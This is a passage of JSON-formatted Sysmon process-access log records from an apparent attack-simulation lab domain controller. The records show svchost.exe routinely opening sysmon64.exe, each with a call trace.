Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3744,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:36.971\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:36.971","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3745,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:36.971\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:36.971","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3746,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:36.971\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:36.971","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3747,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:36.971\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:36.971","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3748,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:36.971\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:36.971","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3749,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:36.971\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:36.971","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3750,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:36.971\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:36.971","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3751,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:36.971\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 